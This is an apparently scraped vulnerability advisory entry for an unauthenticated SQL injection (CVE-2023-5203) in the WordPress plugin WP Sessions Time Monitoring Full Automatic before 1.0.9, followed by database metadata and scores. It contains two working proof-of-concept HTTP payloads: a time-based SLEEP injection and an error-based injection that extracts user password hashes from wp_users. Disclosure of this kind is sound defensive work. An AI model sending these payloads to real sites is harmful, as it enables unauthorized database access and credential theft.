Lucene search
Nicolas SurribasWPEX-ID:7F4F505B-2667-4E0F-9841-9C1CD0831932HistoryNov 30, 2023 - 12:00 a.m.
WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection
2023-11-3000:00:00
Nicolas Surribas
98
wordpress
sql injection
error/union based
Description The plugin does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique.
Blind time based SQLi:
GET /?test=1'%20AND%20(SELECT%208559%20FROM%20(SELECT(SLEEP(5)))WBVZ)%20-- HTTP/1.1
Error/union based SQLi (Requires MySQL and WP_DEBUG enabled):
GET /?test=1%27%20AND%20GTID_SUBSET%28CONCAT%280x686173683a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28user_pass%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%20FROM%20%60wordpress%60.wp_users%20ORDER%20BY%20ID%20LIMIT%201%2C1%29%29%2C3124%29--%20aRelated
cvelist
cvelist
vulnrichment
vulnrichment
cve
cve
CVE-2023-5203
2023-12-26 19:15:07
prion
prion
Sql injection
2023-12-26 19:15:00
wpvulndb
wpvulndb
nvd
nvd
CVE-2023-5203
2023-12-26 19:15:07
AI Score
8.2
Confidence
Low
EPSS
0.001
Percentile
33.2%
Related for WPEX-ID:7F4F505B-2667-4E0F-9841-9C1CD0831932